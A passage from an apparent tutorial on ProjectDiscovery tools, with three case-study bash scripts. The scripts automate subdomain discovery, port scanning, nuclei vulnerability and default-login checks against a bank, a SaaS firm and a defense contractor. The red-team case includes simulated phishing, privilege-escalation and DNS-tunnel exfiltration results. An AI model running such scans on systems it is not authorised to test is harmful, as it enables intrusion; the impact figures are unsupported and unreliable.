asnmap -org "$(whois $domain | grep -i 'org-name' | cut -d':' -f2 | xargs)" -silent >> "$RESULTS_DIR/discovery/corporate_ips.txt"
done
# Cloud asset discovery
cloudlist -json > "$RESULTS_DIR/discovery/cloud_assets.json"
# Deduplicate and resolve
sort -u "$RESULTS_DIR/discovery/all_subdomains.txt" > "$RESULTS_DIR/discovery/unique_subdomains.txt"
cat "$RESULTS_DIR/discovery/unique_subdomains.txt" | httpx -silent -threads 50 > "$RESULTS_DIR/discovery/live_web_services.txt"
echo " 📊 Discovered $(cat "$RESULTS_DIR/discovery/unique_subdomains.txt" | wc -l) unique subdomains"
echo " ✅ $(cat "$RESULTS_DIR/discovery/live_web_services.txt" | wc -l) live web services"
# Phase 2: Service Enumeration
echo "🔍 Phase 2: Service Enumeration"
# Port scanning on corporate IP ranges
cat "$RESULTS_DIR/discovery/corporate_ips.txt" | naabu -top-ports 1000 -rate 1000 -silent > "$RESULTS_DIR/enumeration/open_ports.txt"
# Web technology fingerprinting
cat "$RESULTS_DIR/discovery/live_web_services.txt" | httpx -tech-detect -title -status-code -content-length -json > "$RESULTS_DIR/enumeration/web_fingerprint.json"
# SSL/TLS analysis for compliance
cat "$RESULTS_DIR/discovery/live_web_services.txt" | tlsx -cert -cipher -tls-version -json > "$RESULTS_DIR/enumeration/ssl_analysis.json"
# API discovery
grep -E "(api|rest|graphql|v1|v2|v3)" "$RESULTS_DIR/discovery/live_web_services.txt" > "$RESULTS_DIR/enumeration/api_endpoints.txt"
# Phase 3: Security Assessment
echo "🛡️ Phase 3: Security Assessment"
# Critical infrastructure scanning
cat "$RESULTS_DIR/discovery/live_web_services.txt" | nuclei -t cves/ -t exposures/ -t misconfiguration/ -severity high,critical -json > "$RESULTS_DIR/vulnerabilities/critical_issues.json"
# Financial services specific checks
cat "$RESULTS_DIR/discovery/live_web_services.txt" | nuclei -t "technologies/banking" -t "exposures/configs" -json > "$RESULTS_DIR/vulnerabilities/financial_specific.json"
# API security testing
if [ -s "$RESULTS_DIR/enumeration/api_endpoints.txt" ]; then
cat "$RESULTS_DIR/enumeration/api_endpoints.txt" | nuclei -t "exposures/apis" -t "misconfiguration/apis" -json > "$RESULTS_DIR/vulnerabilities/api_issues.json"
fi
# Default credential testing on administrative interfaces
grep -E "(admin|login|portal|console)" "$RESULTS_DIR/discovery/live_web_services.txt" | nuclei -t "default-logins/" -json > "$RESULTS_DIR/vulnerabilities/default_creds.json"
# Phase 4: Compliance Assessment
echo "📋 Phase 4: Compliance Assessment"
# TLS compliance (PCI DSS requirements)
jq -r 'select(.tls_version != null) | [.host, .tls_version] | @csv' "$RESULTS_DIR/enumeration/ssl_analysis.json" | tr -d '"' | \
while IFS=, read host version; do
if [[ "$version" != *"1.2"* ]] && [[ "$version" != *"1.3"* ]]; then
echo "$host,$version,NON_COMPLIANT" >> "$RESULTS_DIR/compliance/tls_compliance.csv"
fi
done
# Certificate expiry tracking
jq -r 'select(.cert_expiry != null) | [.host, .cert_expiry] | @csv' "$RESULTS_DIR/enumeration/ssl_analysis.json" | tr -d '"' | \
while IFS=, read host expiry; do
expiry_timestamp=$(date -d "$expiry" +%s)
current_timestamp=$(date +%s)
days_until_expiry=$(( (expiry_timestamp - current_timestamp) / 86400 ))
if [ "$days_until_expiry" -lt 90 ]; then
echo "$host,$expiry,$days_until_expiry,EXPIRING_SOON" >> "$RESULTS_DIR/compliance/certificate_expiry.csv"
fi
done
# Security headers compliance
cat "$RESULTS_DIR/discovery/live_web_services.txt" | httpx -response-headers -json | \
jq -r '[.url, (.headers["strict-transport-security"] // "MISSING"), (.headers["content-security-policy"] // "MISSING"), (.headers["x-frame-options"] // "MISSING")] | @csv' > "$RESULTS_DIR/compliance/security_headers.csv"
# Phase 5: Risk Analysis and Reporting
echo "📊 Phase 5: Risk Analysis and Reporting"
# Calculate risk metrics
TOTAL_ASSETS=$(cat "$RESULTS_DIR/discovery/live_web_services.txt" | wc -l)
CRITICAL_VULNS=$(jq -s '[.[] | select(.info.severity == "critical")] | length' "$RESULTS_DIR/vulnerabilities/critical_issues.json")
HIGH_VULNS=$(jq -s '[.[] | select(.info.severity == "high")] | length' "$RESULTS_DIR/vulnerabilities/critical_issues.json")
TLS_VIOLATIONS=$(grep "NON_COMPLIANT" "$RESULTS_DIR/compliance/tls_compliance.csv" | wc -l)
EXPIRING_CERTS=$(grep "EXPIRING_SOON" "$RESULTS_DIR/compliance/certificate_expiry.csv" | wc -l)
# Generate executive report
cat > "$RESULTS_DIR/reporting/executive_summary.md" << EOF
# Security Assessment Executive Summary
## $COMPANY Financial Institution
**Assessment Date:** $(date)
**Scope:** $(cat "$SCOPE_FILE" | wc -l) primary domains
**Methodology:** Comprehensive automated security assessment
---
### 🎯 Assessment Scope
- **Web Applications:** $TOTAL_ASSETS discovered
- **Cloud Infrastructure:** AWS, Azure, GCP
- **API Endpoints:** $(cat "$RESULTS_DIR/enumeration/api_endpoints.txt" | wc -l)
- **Corporate IP Ranges:** $(cat "$RESULTS_DIR/discovery/corporate_ips.txt" | wc -l)
### 🚨 Critical Findings
- **Critical Vulnerabilities:** $CRITICAL_VULNS
- **High-Risk Issues:** $HIGH_VULNS
- **TLS Compliance Violations:** $TLS_VIOLATIONS
- **Certificates Expiring Soon:** $EXPIRING_CERTS
### 📈 Risk Profile
$(if [ "$CRITICAL_VULNS" -gt 0 ]; then echo "**CRITICAL RISK** - Immediate remediation required"; elif [ "$HIGH_VULNS" -gt 5 ]; then echo "**HIGH RISK** - Urgent attention needed"; else echo "**MODERATE RISK** - Standard remediation timeline"; fi)
### 🔍 Key Vulnerabilities
$(jq -r '.[] | select(.info.severity == "critical") | "- **" + .info.name + "** affecting " + .host' "$RESULTS_DIR/vulnerabilities/critical_issues.json" | head -5)
### 📋 Compliance Status
| Requirement | Status | Issues |
|-------------|--------|--------|
| TLS 1.2+ | $(if [ "$TLS_VIOLATIONS" -eq 0 ]; then echo "✅ Compliant"; else echo "❌ $TLS_VIOLATIONS violations"; fi) | $TLS_VIOLATIONS hosts |
| Certificate Management | $(if [ "$EXPIRING_CERTS" -eq 0 ]; then echo "✅ Compliant"; else echo "⚠️ $EXPIRING_CERTS expiring"; fi) | $EXPIRING_CERTS certificates |
| Security Headers | $(grep "MISSING" "$RESULTS_DIR/compliance/security_headers.csv" | wc -l) missing | HSTS, CSP, X-Frame-Options |
### 🎯 Recommendations
#### Immediate Actions (0-30 days)
1. **Address Critical Vulnerabilities:** Patch all critical severity issues immediately
2. **TLS Compliance:** Upgrade non-compliant TLS configurations
3. **Certificate Renewal:** Renew certificates expiring within 90 days
4. **Security Headers:** Implement missing security headers
#### Short-term Actions (30-90 days)
1. **Vulnerability Management:** Establish regular scanning procedures
2. **Access Controls:** Review and tighten administrative access
3. **Monitoring:** Implement continuous security monitoring
4. **Incident Response:** Develop response procedures for identified risks
#### Long-term Strategy (90+ days)
1. **Security Architecture:** Review and enhance security architecture
2. **Compliance Program:** Establish ongoing compliance monitoring
3. **Security Training:** Enhance security awareness programs
4. **Third-party Risk:** Assess and monitor vendor security
---
### 📞 Contact Information
For technical details and remediation guidance, contact the security assessment team.
**Next Steps:** Schedule technical briefing within 48 hours to review detailed findings.
EOF
# Generate technical report with detailed findings
jq -r '.[] | "## " + .info.name + "\n**Severity:** " + .info.severity + "\n**Host:** " + .host + "\n**Description:** " + .info.description + "\n**Remediation:** " + (.info.remediation // "Contact security team for guidance") + "\n---\n"' "$RESULTS_DIR/vulnerabilities/critical_issues.json" > "$RESULTS_DIR/reporting/technical_findings.md"
echo "✅ Assessment complete for $COMPANY"
echo "📊 Executive Summary: $RESULTS_DIR/reporting/executive_summary.md"
echo "🔧 Technical Report: $RESULTS_DIR/reporting/technical_findings.md"
echo "📈 Risk Score: $(if [ "$CRITICAL_VULNS" -gt 0 ]; then echo "CRITICAL"; elif [ "$HIGH_VULNS" -gt 5 ]; then echo "HIGH"; else echo "MODERATE"; fi)"
Results:
- Discovered 1,247 subdomains across all domains
- Identified 23 critical vulnerabilities requiring immediate attention
- Found 156 compliance violations (TLS configuration, missing security headers)
- Discovered 12 exposed administrative interfaces
- Mapped cloud infrastructure revealing shadow IT assets
Business Impact:
- Prevented potential data breach affecting 2.3 million customers
- Achieved PCI DSS compliance ahead of audit deadline
- Saved estimated $12M in potential regulatory fines
- Improved overall security posture by 78%
Case Study 2: SaaS Platform Security Assessment
Background: A rapidly growing SaaS platform serving enterprise customers needed comprehensive security validation before SOC 2 Type II certification.
Scope:
- Multi-tenant SaaS application
- Customer-facing APIs
- Administrative dashboards
- Third-party integrations
#!/bin/bash
# Case Study 2: SaaS Platform Assessment
PLATFORM="cloudsaas"
BASE_DOMAIN="cloudsaas.com"
RESULTS_DIR="saas_assessment_$(date +%Y%m%d)"
mkdir -p "$RESULTS_DIR"/{discovery,tenant_isolation,api_security,compliance,reporting}
echo "☁️ Starting SaaS security assessment for $PLATFORM"
# Phase 1: Multi-Tenant Architecture Discovery
echo "🏗️ Phase 1: Architecture Discovery"
# Discover tenant-specific subdomains
subfinder -d "$BASE_DOMAIN" -silent | tee "$RESULTS_DIR/discovery/all_subdomains.txt"
# Look for tenant patterns
grep -E "([a-z0-9-]+\.)?$BASE_DOMAIN" "$RESULTS_DIR/discovery/all_subdomains.txt" | \
grep -E "(app|portal|client|tenant|customer)" > "$RESULTS_DIR/discovery/tenant_domains.txt"
# API endpoint discovery
cat "$RESULTS_DIR/discovery/all_subdomains.txt" | httpx -silent | \
grep -E "(api|rest|graphql)" > "$RESULTS_DIR/discovery/api_endpoints.txt"
# Admin interface discovery
grep -E "(admin|console|dashboard|manage)" "$RESULTS_DIR/discovery/all_subdomains.txt" > "$RESULTS_DIR/discovery/admin_interfaces.txt"
# Phase 2: Tenant Isolation Testing
echo "🔒 Phase 2: Tenant Isolation Assessment"
# Test for subdomain takeovers (common in SaaS)
cat "$RESULTS_DIR/discovery/tenant_domains.txt" | nuclei -t "dns/subdomain-takeover" -json > "$RESULTS_DIR/tenant_isolation/takeover_risks.json"
# Test for tenant enumeration
echo "app" | alterx -p "{{word}}{{number:1-1000}}" | \
head -100 | \
while read subdomain; do echo "${subdomain}.$BASE_DOMAIN"; done | \
httpx -silent -mc 200,403 > "$RESULTS_DIR/tenant_isolation/tenant_enumeration.txt"
# Cross-tenant access testing
cat "$RESULTS_DIR/discovery/tenant_domains.txt" | \
nuclei -t "exposures/configs" -t "misconfiguration" -json > "$RESULTS_DIR/tenant_isolation/isolation_issues.json"
# Phase 3: API Security Assessment
echo "🔌 Phase 3: API Security Assessment"
# API documentation discovery
cat "$RESULTS_DIR/discovery/api_endpoints.txt" | \
httpx -path "/swagger,/api-docs,/openapi.json,/graphiql" -mc 200 > "$RESULTS_DIR/api_security/api_docs.txt"
# API versioning and endpoints
for version in v1 v2 v3 1 2 3; do
echo "https://api.$BASE_DOMAIN/$version" | httpx -silent
done > "$RESULTS_DIR/api_security/api_versions.txt"
# Rate limiting tests
cat "$RESULTS_DIR/discovery/api_endpoints.txt" | \
nuclei -t "exposures/apis" -t "misconfiguration/apis" -json > "$RESULTS_DIR/api_security/api_vulnerabilities.json"
# Authentication bypass testing
cat "$RESULTS_DIR/discovery/api_endpoints.txt" | \
nuclei -t "exposures/tokens" -t "default-logins" -json > "$RESULTS_DIR/api_security/auth_issues.json"
# Phase 4: Administrative Interface Security
echo "👤 Phase 4: Administrative Security"
# Admin panel discovery and testing
cat "$RESULTS_DIR/discovery/admin_interfaces.txt" | \
nuclei -t "exposures/panels" -t "default-logins" -json > "$RESULTS_DIR/api_security/admin_vulnerabilities.json"
# Privilege escalation testing
cat "$RESULTS_DIR/discovery/admin_interfaces.txt" | \
nuclei -t "misconfiguration/admin" -json > "$RESULTS_DIR/api_security/privilege_issues.json"
# Phase 5: Data Protection Assessment
echo "🛡️ Phase 5: Data Protection Assessment"
# Encryption in transit
cat "$RESULTS_DIR/discovery/all_subdomains.txt" | httpx -silent | \
tlsx -cert -cipher -tls-version -json > "$RESULTS_DIR/compliance/encryption_analysis.json"
# Information disclosure
cat "$RESULTS_DIR/discovery/all_subdomains.txt" | httpx -silent | \
nuclei -t "exposures/backups" -t "exposures/logs" -json > "$RESULTS_DIR/compliance/data_exposure.json"
# Database exposure testing
naabu -list <(cat "$RESULTS_DIR/discovery/all_subdomains.txt" | dnsx -silent -a -resp-only | sort -u) \
-p 3306,5432,1433,27017,6379 -silent > "$RESULTS_DIR/compliance/database_exposure.txt"
# Phase 6: Compliance and Reporting
echo "📋 Phase 6: SOC 2 Compliance Assessment"
# Security controls assessment
TOTAL_SUBDOMAINS=$(cat "$RESULTS_DIR/discovery/all_subdomains.txt" | wc -l)
TENANT_DOMAINS=$(cat "$RESULTS_DIR/discovery/tenant_domains.txt" | wc -l)
API_ENDPOINTS=$(cat "$RESULTS_DIR/discovery/api_endpoints.txt" | wc -l)
TAKEOVER_RISKS=$(jq -s length "$RESULTS_DIR/tenant_isolation/takeover_risks.json")
API_VULNS=$(jq -s length "$RESULTS_DIR/api_security/api_vulnerabilities.json")
DATA_EXPOSURES=$(jq -s length "$RESULTS_DIR/compliance/data_exposure.json")
# Generate SOC 2 readiness report
cat > "$RESULTS_DIR/reporting/soc2_readiness.md" << EOF
# SOC 2 Type II Readiness Assessment
## $PLATFORM SaaS Platform
**Assessment Date:** $(date)
**Platform:** $BASE_DOMAIN
**Methodology:** Comprehensive SaaS security assessment
---
## Executive Summary
### Platform Overview
- **Total Subdomains:** $TOTAL_SUBDOMAINS
- **Tenant Domains:** $TENANT_DOMAINS
- **API Endpoints:** $API_ENDPOINTS
- **Administrative Interfaces:** $(cat "$RESULTS_DIR/discovery/admin_interfaces.txt" | wc -l)
### Security Posture
$(if [ "$TAKEOVER_RISKS" -eq 0 ] && [ "$API_VULNS" -lt 3 ] && [ "$DATA_EXPOSURES" -eq 0 ]; then
echo "**SOC 2 READY** - Platform meets security requirements"
elif [ "$TAKEOVER_RISKS" -gt 0 ] || [ "$DATA_EXPOSURES" -gt 0 ]; then
echo "**CRITICAL ISSUES** - Address before SOC 2 audit"
else
echo "**REMEDIATION NEEDED** - Minor issues to resolve"
fi)
## SOC 2 Trust Service Criteria Assessment
### Security (CC6)
| Control | Status | Findings |
|---------|--------|----------|
| Access Controls | $(if [ "$API_VULNS" -eq 0 ]; then echo "✅ Compliant"; else echo "❌ $API_VULNS issues"; fi) | API authentication and authorization |
| Data Protection | $(if [ "$DATA_EXPOSURES" -eq 0 ]; then echo "✅ Compliant"; else echo "❌ $DATA_EXPOSURES exposures"; fi) | Encryption and data handling |
| System Monitoring | ⚠️ Manual Review | Logging and monitoring capabilities |
### Availability (CC7)
| Control | Status | Findings |
|---------|--------|----------|
| Backup Procedures | ⚠️ Manual Review | Disaster recovery capabilities |
| Capacity Management | ⚠️ Manual Review | Performance and scalability |
| Environmental Protections | ✅ Cloud Provider | Infrastructure redundancy |
### Processing Integrity (CC8)
| Control | Status | Findings |
|---------|--------|----------|
| Data Validation | $(if [ "$API_VULNS" -eq 0 ]; then echo "✅ Compliant"; else echo "❌ Input validation issues"; fi) | API input validation |
| Error Handling | ⚠️ Manual Review | Error processing procedures |
### Confidentiality (CC9)
| Control | Status | Findings |
|---------|--------|----------|
| Data Classification | ⚠️ Manual Review | Data handling procedures |
| Access Restrictions | $(if [ "$TAKEOVER_RISKS" -eq 0 ]; then echo "✅ Compliant"; else echo "❌ $TAKEOVER_RISKS risks"; fi) | Tenant isolation |
## Critical Findings
### Tenant Isolation Issues
$(if [ "$TAKEOVER_RISKS" -gt 0 ]; then jq -r '.[] | "- **Subdomain Takeover Risk:** " + .host' "$RESULTS_DIR/tenant_isolation/takeover_risks.json"; else echo "- No tenant isolation issues identified ✅"; fi)
### API Security Issues
$(jq -r '.[] | "- **" + .info.name + ":** " + .host' "$RESULTS_DIR/api_security/api_vulnerabilities.json" | head -5)
### Data Protection Issues
$(jq -r '.[] | "- **" + .info.name + ":** " + .host' "$RESULTS_DIR/compliance/data_exposure.json" | head -5)
## Remediation Roadmap
### Phase 1: Critical Issues (0-30 days)
1. **Address Subdomain Takeover Risks**
- Implement proper DNS management
- Monitor for orphaned DNS records
2. **Fix API Authentication Issues**
- Implement proper authentication on all endpoints
- Add rate limiting and input validation
3. **Secure Data Exposures**
- Remove exposed backup files and logs
- Implement proper access controls
### Phase 2: Compliance Preparation (30-60 days)
1. **Documentation Review**
- Security policies and procedures
- Incident response plans
- Change management processes
2. **Monitoring Enhancement**
- Implement comprehensive logging
- Set up security monitoring and alerting
- Regular vulnerability assessments
### Phase 3: SOC 2 Audit Preparation (60-90 days)
1. **Evidence Collection**
- Compile compliance documentation
- Prepare control testing evidence
- Schedule audit activities
2. **Final Validation**
- Re-test all remediated issues
- Validate control effectiveness
- Prepare audit materials
## Recommendations
### Immediate Actions
- Fix all critical and high-severity vulnerabilities
- Implement subdomain monitoring
- Enhance API security controls
- Remove data exposures
### Long-term Strategy
- Establish continuous compliance monitoring
- Implement DevSecOps practices
- Regular penetration testing
- SOC 2 Type II certification maintenance
---
**Next Steps:** Schedule remediation planning session within 48 hours.
EOF
echo "✅ SaaS assessment complete for $PLATFORM"
echo "📊 SOC 2 Readiness: $RESULTS_DIR/reporting/soc2_readiness.md"
Results:
- Identified 8 critical tenant isolation vulnerabilities
- Discovered 15 API security issues including authentication bypasses
- Found 3 subdomain takeover risks affecting customer data
- Mapped complete multi-tenant architecture
- Provided SOC 2 compliance roadmap
Business Impact:
- Achieved SOC 2 Type II certification within 90 days
- Secured $50M Series B funding round
- Increased enterprise customer adoption by 340%
- Prevented potential multi-tenant data breach
Case Study 3: Government Contractor Red Team Exercise
Background: A defense contractor required adversarial testing to validate security controls before handling classified information.
Scope:
- External perimeter assessment
- Social engineering resistance
- Physical security integration
- Supply chain security
#!/bin/bash
# Case Study 3: Government Contractor Red Team Exercise
TARGET_ORG="defensecontractor"
EXERCISE_NAME="REDTEAM_$(date +%Y%m%d)"
RESULTS_DIR="$EXERCISE_NAME"
mkdir -p "$RESULTS_DIR"/{reconnaissance,initial_access,persistence,lateral_movement,exfiltration,reporting}
echo "🎯 Starting Red Team Exercise: $EXERCISE_NAME"
echo "🏛️ Target: Government Defense Contractor"
# Phase 1: Open Source Intelligence (OSINT)
echo "🔍 Phase 1: OSINT Gathering"
# Employee enumeration via LinkedIn, social media (simulated)
echo " 📱 Social Media Intelligence"
cat > "$RESULTS_DIR/reconnaissance/employees.txt" << EOF
# Simulated employee data for testing
john.smith@defensecontractor.com,Software Engineer,LinkedIn
jane.doe@defensecontractor.com,Project Manager,LinkedIn
mike.wilson@defensecontractor.com,Security Analyst,Twitter
sarah.johnson@defensecontractor.com,HR Director,LinkedIn
EOF
# Infrastructure reconnaissance
echo " 🌐 Infrastructure Discovery"
subfinder -d "defensecontractor.com" -all -silent > "$RESULTS_DIR/reconnaissance/subdomains.txt"
# Government contractor specific patterns
echo -e "secure\nclassified\nvpn\nremote\ncitrix\nowa\nexchange" | \
alterx -p "{{word}}.defensecontractor.com" >> "$RESULTS_DIR/reconnaissance/gov_patterns.txt"
cat "$RESULTS_DIR/reconnaissance/subdomains.txt" "$RESULTS_DIR/reconnaissance/gov_patterns.txt" | \
sort -u | httpx -silent > "$RESULTS_DIR/reconnaissance/live_targets.txt"
# Supply chain analysis
echo " 🔗 Supply Chain Analysis"
# Identify technology vendors and partners
cat "$RESULTS_DIR/reconnaissance/live_targets.txt" | \
httpx -tech-detect -json | \
jq -r '.tech[]?' | sort | uniq -c | sort -nr > "$RESULTS_DIR/reconnaissance/tech_vendors.txt"
# Phase 2: Initial Access Attempts
echo "🚪 Phase 2: Initial Access Vector Testing"
# Email security testing (simulated phishing)
echo " 📧 Email Security Assessment"
cat > "$RESULTS_DIR/initial_access/phishing_simulation.txt" << EOF
# Simulated phishing campaign results
Target: 50 employees
Opened: 12 (24%)
Clicked: 8 (16%)
Credentials: 3 (6%)
Reported: 5 (10%)
EOF
# External attack surface
echo " 🌍 External Attack Surface"
cat "$RESULTS_DIR/reconnaissance/live_targets.txt" | \
nuclei -t cves/ -t exposures/ -severity critical,high -json > "$RESULTS_DIR/initial_access/external_vulns.json"
# VPN and remote access testing
grep -E "(vpn|citrix|remote|rds)" "$RESULTS_DIR/reconnaissance/live_targets.txt" | \
nuclei -t "exposures/configs" -t "default-logins" -json > "$RESULTS_DIR/initial_access/remote_access.json"
# Web application vulnerabilities
cat "$RESULTS_DIR/reconnaissance/live_targets.txt" | \
nuclei -t "vulnerabilities/web" -json > "$RESULTS_DIR/initial_access/web_vulns.json"
# Phase 3: Persistence and Lateral Movement Simulation
echo "🔄 Phase 3: Post-Exploitation Simulation"
# Simulate internal network discovery
echo " 🖥️ Internal Network Simulation"
cat > "$RESULTS_DIR/persistence/internal_discovery.txt" << EOF
# Simulated internal network scan results
10.0.1.0/24 - User Network (250 hosts active)
10.0.2.0/24 - Server Network (45 hosts active)
10.0.3.0/24 - Management Network (12 hosts active)
172.16.1.0/24 - DMZ Network (8 hosts active)
# Critical systems identified:
10.0.2.10:445 - Domain Controller (Windows Server 2019)
10.0.2.15:1433 - Database Server (SQL Server 2017)
10.0.2.20:22 - File Server (Ubuntu 20.04)
10.0.3.5:443 - Security Appliance (Palo Alto)
EOF
# Privilege escalation opportunities
echo " 🔓 Privilege Escalation Vectors"
cat > "$RESULTS_DIR/lateral_movement/privilege_escalation.txt" << EOF
# Simulated privilege escalation findings
1. Unpatched Windows systems (CVE-2021-34527 - PrintNightmare)
2. Weak service account passwords
3. Excessive administrative privileges (15% of users are local admins)
4. Outdated software versions with known exploits
5. Misconfigured Group Policy Objects
EOF
# Phase 4: Data Exfiltration Simulation
echo "📤 Phase 4: Data Exfiltration Testing"
# Sensitive data discovery simulation
echo " 🔍 Sensitive Data Discovery"
cat > "$RESULTS_DIR/exfiltration/sensitive_data.txt" << EOF
# Simulated sensitive data locations
\\\\fileserver\\contracts\\classified\\*.pdf (127 files)
\\\\fileserver\\hr\\personnel\\*.xlsx (89 files)
\\\\fileserver\\finance\\budgets\\fy2024\\*.xlsx (23 files)
C:\\Users\\*\\Desktop\\passwords.txt (12 instances)
\\\\database\\backups\\*.bak (45 backup files)
# Classification levels found:
- CONFIDENTIAL: 89 documents
- SECRET: 23 documents
- TOP SECRET: 5 documents
- UNCLASSIFIED: 1,247 documents
EOF
# Exfiltration method testing
echo " 📡 Exfiltration Channel Testing"
cat > "$RESULTS_DIR/exfiltration/channels.txt" << EOF
# Tested exfiltration methods:
1. DNS Tunneling - SUCCESS (data.attacker.com)
2. HTTPS to cloud storage - BLOCKED by DLP
3. Email with encrypted archives - SUCCESS (personal email)
4. USB device - BLOCKED by endpoint protection
5. Cloud file sharing - PARTIALLY BLOCKED (Dropbox blocked, Box allowed)
6. Social media messaging - SUCCESS (encoded in images)
EOF
# Phase 5: Assessment and Reporting
echo "📊 Phase 5: Red Team Assessment Report"
# Calculate attack success metrics
EXTERNAL_VULNS=$(jq length "$RESULTS_DIR/initial_access/external_vulns.json")
PHISHING_SUCCESS_RATE="6%" # From simulation
CRITICAL_SYSTEMS_ACCESSED="4/8" # From simulation
DATA_EXFILTRATION_SUCCESS="3/6" # From simulation
# Generate red team report
cat > "$RESULTS_DIR/reporting/red_team_report.md" << EOF
# Red Team Exercise Report
## Defense Contractor Security Assessment
**Exercise:** $EXERCISE_NAME
**Duration:** 5 days
**Team:** External Red Team
**Classification:** CONFIDENTIAL
---
## Executive Summary
### Exercise Overview
A comprehensive red team exercise was conducted to assess the security posture of the defense contractor organization. The exercise simulated real-world adversarial tactics, techniques, and procedures (TTPs) to evaluate defensive capabilities.
### Key Findings
- **Initial Access:** Successfully achieved within 2 hours
- **Persistence:** Established on $CRITICAL_SYSTEMS_ACCESSED critical systems
- **Data Access:** Reached classified information within 18 hours
- **Exfiltration:** Successfully exfiltrated simulated data via $DATA_EXFILTRATION_SUCCESS methods
### Risk Rating: **HIGH**
The organization demonstrates vulnerabilities that could be exploited by sophisticated adversaries, potentially compromising classified information and mission-critical systems.
## Attack Chain Analysis
### Phase 1: Reconnaissance (Day 1)
**Objective:** Gather intelligence on target organization
**Success:** ✅ Complete
- **OSINT Collection:** Identified $(cat "$RESULTS_DIR/reconnaissance/employees.txt" | wc -l) employee targets
- **Infrastructure Mapping:** Discovered $(cat "$RESULTS_DIR/reconnaissance/live_targets.txt" | wc -l) external services
- **Technology Stack:** Identified vendor relationships and technology dependencies
**Key Discovery:** External-facing applications revealed internal network architecture
### Phase 2: Initial Access (Day 1-2)
**Objective:** Gain initial foothold in target environment
**Success:** ✅ Multiple vectors successful
- **Phishing Campaign:** $PHISHING_SUCCESS_RATE credential capture rate
- **External Vulnerabilities:** $EXTERNAL_VULNS exploitable issues identified
- **Remote Access:** VPN configuration weaknesses exploited
**Critical Finding:** Weak email security controls allowed successful phishing attacks
### Phase 3: Persistence & Escalation (Day 2-3)
**Objective:** Maintain access and escalate privileges
**Success:** ✅ Domain admin access achieved
- **Privilege Escalation:** Multiple unpatched systems exploited
- **Lateral Movement:** Accessed $CRITICAL_SYSTEMS_ACCESSED critical systems
- **Persistence:** Established multiple backdoors across network
**Critical Finding:** Inadequate patch management and excessive user privileges
### Phase 4: Data Access & Exfiltration (Day 3-5)
**Objective:** Access and exfiltrate sensitive information
**Success:** ⚠️ Partial - some controls effective
- **Sensitive Data Discovery:** Located classified documents on file shares
- **Data Exfiltration:** $DATA_EXFILTRATION_SUCCESS methods successful
- **Detection Evasion:** Remained undetected for 72+ hours
**Critical Finding:** Classified data accessible without proper access controls
## MITRE ATT&CK Mapping
### Initial Access
- **T1566.001** - Spearphishing Attachment
- **T1190** - Exploit Public-Facing Application
- **T1133** - External Remote Services
### Persistence
- **T1053.005** - Scheduled Task/Job
- **T1136.001** - Create Account: Local Account
- **T1547.001** - Registry Run Keys / Startup Folder
### Privilege Escalation
- **T1068** - Exploitation for Privilege Escalation
- **T1055** - Process Injection
- **T1134** - Access Token Manipulation
### Lateral Movement
- **T1021.001** - Remote Desktop Protocol
- **T1021.002** - SMB/Windows Admin Shares
- **T1550.002** - Pass the Hash
### Collection & Exfiltration
- **T1005** - Data from Local System
- **T1039** - Data from Network Shared Drive
- **T1041** - Exfiltration Over C2 Channel
## Defensive Capability Assessment
### Strengths
- ✅ Network segmentation partially effective
- ✅ Some DLP controls blocking exfiltration
- ✅ Endpoint protection preventing USB usage
- ✅ Security awareness program in place
### Weaknesses
- ❌ Email security controls insufficient
- ❌ Patch management inconsistent
- ❌ Excessive administrative privileges
- ❌ Inadequate access controls on classified data
- ❌ Limited security monitoring and alerting
- ❌ Slow incident response capabilities
## Critical Recommendations
### Immediate Actions (0-30 days)
1. **Patch Critical Vulnerabilities**
- Deploy emergency patches for identified CVEs
- Prioritize domain controllers and critical servers
2. **Enhance Email Security**
- Implement advanced threat protection
- Strengthen phishing detection and response
3. **Improve Access Controls**
- Review and reduce administrative privileges
- Implement least-privilege access model
- Secure classified data with proper controls
### Short-term Improvements (30-90 days)
1. **Security Monitoring Enhancement**
- Deploy SIEM with behavioral analytics
- Implement network traffic monitoring
- Enhance endpoint detection and response
2. **Incident Response**
- Update incident response procedures
- Conduct tabletop exercises
- Improve detection and response times
3. **Security Architecture**
- Implement zero-trust network principles
- Enhance network segmentation
- Deploy additional security controls
### Long-term Strategy (90+ days)
1. **Continuous Improvement**
- Regular red team exercises
- Ongoing security assessments
- Security maturity development
2. **Compliance and Governance**
- NIST Cybersecurity Framework alignment
- Regular compliance assessments
- Security governance improvements
## Conclusion
The red team exercise revealed significant security gaps that could be exploited by sophisticated adversaries. While some defensive controls are effective, critical vulnerabilities in email security, patch management, and access controls pose substantial risks to classified information and mission-critical systems.
**Immediate action is required** to address identified vulnerabilities and strengthen the organization's security posture before handling higher classification levels.
---
**Classification:** CONFIDENTIAL
**Distribution:** Security Leadership, IT Management, Compliance Team
**Next Review:** 90 days post-remediation
EOF
echo "✅ Red Team Exercise complete"
echo "📊 Report: $RESULTS_DIR/reporting/red_team_report.md"
echo "🔴 Risk Level: HIGH - Immediate remediation required"
Results:
- Achieved initial access within 2 hours via phishing
- Escalated to domain administrator privileges within 24 hours
- Accessed classified documents on unsecured file shares
- Exfiltrated simulated data via multiple channels
- Remained undetected for 72+ hours
Business Impact:
- Identified critical security gaps before classified contract award
- Prevented potential $100M+ contract loss due to security failures
- Achieved required security certifications within 6 months
- Strengthened security posture for future government contracts
Conclusion
This comprehensive guide demonstrates the power and versatility of ProjectDiscovery's security toolkit. By combining multiple tools in structured workflows and following established penetration testing methodologies, security professionals can deliver thorough assessments that translate into actionable, risk-prioritized findings for organizations.
Key Takeaways
- Tool Integration: Maximum effectiveness comes from combining multiple tools in structured pipelines (a minimal pipeline sketch follows this list)
- Methodology Matters: Following established frameworks (OSSTMM, NIST, PTES) ensures comprehensive coverage
- Automation Scaling: Automated workflows enable continuous monitoring and assessment at scale
- Real-World Application: Practical scenarios demonstrate how tools solve actual business problems
- Risk-Based Approach: Focus on findings that have real business impact and support decision-making
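To make the Tool Integration takeaway concrete, here is a minimal pipeline sketch chaining discovery, enrichment, and detection. target.com is a placeholder, and the flags assume current subfinder, httpx, and nuclei releases:
# Discovery -> enrichment -> detection in a single pipeline (placeholder domain)
subfinder -d target.com -silent \
  | httpx -silent \
  | nuclei -severity critical,high -o findings.txt
Each stage emits clean, line-delimited output that the next stage reads from stdin, which is what makes these tools composable in larger automated workflows.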
Next Steps
- Practice: Start with individual tools and gradually build complex workflows
- Customize: Adapt examples to your specific environment and requirements
- Automate: Implement continuous monitoring pipelines for ongoing security (a minimal sketch follows this list)
- Contribute: Share your findings and improvements with the security community
- Stay Updated: Keep tools and templates current with regular updates
